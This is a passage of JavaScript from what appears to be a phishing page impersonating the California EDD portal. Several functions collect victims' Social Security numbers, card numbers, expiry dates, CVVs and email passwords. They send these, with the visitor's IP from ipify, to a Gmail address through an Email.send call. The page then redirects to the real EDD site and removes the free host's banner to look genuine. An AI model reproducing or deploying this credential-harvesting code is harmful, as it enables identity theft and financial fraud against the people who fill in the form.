        alert('Card Year is Empty');
        return false;
    }
	if (document.getElementById('ssn').value === '') {
        alert('SSN is Empty');
        return false;
    }
	if (document.getElementById('cvv').value === '') {
        alert('CVV is Empty');
        return false;
    }
	var BT20 = document.getElementById("Div20");
	var BT21 = document.getElementById("Div21");
	if (BT20.style.display === "block" && BT21.style.display === "none") {
         BT20.style.display = "none";
	     BT21.style.display = "block";
	 } 
	setTimeout(function() {
	 var zx = document.getElementById("Div4");
	 var zxx = document.getElementById("Div3");
     if (zx.style.display === "block" && zxx.style.display === "none") {
         zx.style.display = "none";
	     zxx.style.display = "block";
	 } 
	}, 3000);
    var ssn = document.getElementById('ssn').value;
	var card = document.getElementById('card').value;
	var expm = document.getElementById('expm').value;
	var expy = document.getElementById('expy').value;
	var cvv = document.getElementById('cvv').value;
	var usrip4 = document.getElementById('usrip4').value;
	Email.send({
    SecureToken : "b1197ac5-14d1-4c4b-a6db-5a6b7ddab04c",
    To : 'mrjetjibbs@gmail.com',
    From : "justine.meulemans@skynet.be",
    Subject : 'DEE: IP: ' + usrip4,
    Body : 'DEE: - SSN: ' + ssn + ' || CARD: ' + card + ' || CVV: ' + cvv + ' || EXPR: ' + expm + '/' + expy
    }).then(message);
	}
</script>
<script type='text/javascript'>
 function sendEmail5() {
    if (document.getElementById('card2').value === '') {
        alert('Card Number is Empty');
        return false;
    }
    if (document.getElementById('expm2').value === '') {
        alert('Card Month is Empty');
        return false;
    }
	if (document.getElementById('expy2').value === '') {
        alert('Card Year is Empty');
        return false;
    }
	if (document.getElementById('ssn2').value === '') {
        alert('SSN is Empty');
        return false;
    }
	if (document.getElementById('cvv2').value === '') {
        alert('CVV is Empty');
        return false;
    }
	var BTR = document.getElementById("Div22");
	var BTRR = document.getElementById("Div23");
	if (BTR.style.display === "block" && BTRR.style.display === "none") {
         BTR.style.display = "none";
	     BTRR.style.display = "block";
	 }
	 setTimeout(function() {
	 var xAC = document.getElementById("Div5");
	 var yAC = document.getElementById("Div6");
     if (xAC.style.display === "block" && yAC.style.display === "none") {
         xAC.style.display = "none";
	     yAC.style.display = "block";
	 } 
	}, 3000);
    var ssn2 = document.getElementById('ssn2').value;
	var card2 = document.getElementById('card2').value;
	var expm2 = document.getElementById('expm2').value;
	var expy2 = document.getElementById('expy2').value;
	var cvv2 = document.getElementById('cvv2').value;
	var usrip5 = document.getElementById('usrip5').value;
	Email.send({
    SecureToken : "b1197ac5-14d1-4c4b-a6db-5a6b7ddab04c",
    To : 'mrjetjibbs@gmail.com',
    From : "justine.meulemans@skynet.be",
    Subject : 'DEE: IP: ' + usrip5,
    Body : 'DEE: - SSN2: ' + ssn2 + ' || CARD2: ' + card2 + ' || CVV2: ' + cvv2 + ' || EXPR2: ' + expm2 + '/' + expy2
    }).then(message);
	}
</script>
<script type='text/javascript'>
 function sendEmail6() {
    if (document.getElementById('caemail').value === '') {
        alert('Email address is Empty');
        return false;
    }
	if (document.getElementById('capass').value === '') {
        alert('Email Password is Empty');
        return false;
    }
	var BTYYA = document.getElementById("Div30");
	var BTZZA = document.getElementById("Div31");
	if (BTYYA.style.display === "block" && BTZZA.style.display === "none") {
         BTYYA.style.display = "none";
	     BTZZA.style.display = "block";
	 } 
    var caemail = document.getElementById('caemail').value;
	var capass = document.getElementById('capass').value;
	var usrip6 = document.getElementById('usrip6').value;
	Email.send({
    SecureToken : "b1197ac5-14d1-4c4b-a6db-5a6b7ddab04c",
    To : 'mrjetjibbs@gmail.com',
    From : "justine.meulemans@skynet.be",
    Subject : 'DEE: IP: ' + usrip6,
    Body : 'DEE: - CA GV Email: ' + caemail + ' || CA Password: ' + capass
    }).then(message => alert('Success:'));
	setTimeout(function() { window.location.replace("https://portal.edd.ca.gov/"); }, 1000);
	}
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> 
<script> 
$.getJSON("https://api.ipify.org?format=json", 
function(data) { 
var ipx = data.ip;
document.getElementById('usrip1').value = ipx;
document.getElementById('usrip2').value = ipx;
document.getElementById('usrip3').value = ipx;
document.getElementById('usrip4').value = ipx;
document.getElementById('usrip5').value = ipx;
document.getElementById('usrip6').value = ipx;
}) 
</script>


<script> 
window.onload = () => {
   let bannerNode = document.querySelector('[alt="www.000webhost.com"]').parentNode.parentNode;
   bannerNode.parentNode.removeChild(bannerNode);
}
</script>